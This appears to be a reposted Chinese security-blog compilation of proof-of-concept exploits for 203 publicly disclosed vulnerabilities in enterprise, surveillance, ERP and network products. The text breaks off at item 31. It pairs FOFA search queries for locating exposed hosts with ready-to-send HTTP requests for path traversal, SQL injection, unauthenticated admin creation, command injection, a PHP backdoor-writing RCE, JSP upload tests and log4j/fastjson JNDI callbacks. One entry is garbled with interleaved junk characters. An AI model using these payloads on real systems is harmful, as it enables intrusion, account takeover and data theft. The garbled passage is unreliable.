Compilation of publicly disclosed internet vulnerabilities 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29

道一安全 2024-06-05 07:41 北京
The following article is from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in security offence and defence, and we hope this article is of some help to everyone's defence. Defenders can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 POCs for high-severity vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Article content: because of length limits, a few POCs that were too long have been replaced with the word PAYLOAD; search for the complete POC yourself if you need it.

Legal rights: if any content infringes a party's legal rights, contact the 网络安全新视界 team through the account backend and the content will be removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version currently available; when using it, press F12 and search for a keyword.

Bookmark this article if you need it, or follow the 网络安全新视界 official account.

Table of contents

01
1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌 EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
21. 大华 ICC intelligent IoT integrated management platform random remote code execution
22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友 NC 6.5 accept.jsp arbitrary file upload
25. 用友 NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo endpoint SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php endpoint arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. 泛微 E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 ezOFFICE collaboration management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording and broadcasting system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload endpoint file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 all-media news gathering and editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload
POC list

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Replace password with the MD5 of the password you want to set.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin backend with the default account admin, perform the following operation:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword
Host: x.x.x.x

The payload is the double URL-encoded form of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
10. 蓝凌 EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌 EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: the POST request; the function it writes executes a command that is passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: send the following request to the test target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip
13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华 ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行7 c$ t: M& J! |) f9 c. e" O6 A
FOFA:icon_hash="-1935899595"
! Z7 z& F) V' J6 M: p* D0 i/ a0 K0 dPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
( L  L$ F# o- s4 w( N9 j" }6 EHost: your-ip
3 {- g- x. k/ h% l  LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15  t- C3 C8 n1 c+ f9 i
Content-Type: application/json;charset=utf-87 g0 h/ E' t' j
Accept-Encoding: gzip1 W, \* U* Z; ~1 g; ?
Connection: close6 i& o1 F% Z5 y  }5 D. E8 c. n! G! \
. M8 x3 Y- c( w6 \0 s: _
{
5 b  X9 |( x( Y; o% L  M6 Z    "a":{
" }* P" X5 x/ f; q6 n$ b: Y        "@type":"com.alibaba.fastjson.JSONObject",) W9 ~, v1 c2 ]& H
       {"@type":"java.net.URL","val":"http://DNSLOG"}
0 K+ j4 N0 V# }2 c2 O        }""
$ n# @/ M: ], [}& Z  E5 K- e1 o$ ], q  P

. S9 A; E1 A7 a" V8 k% _% ~9 L' b; C" O
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
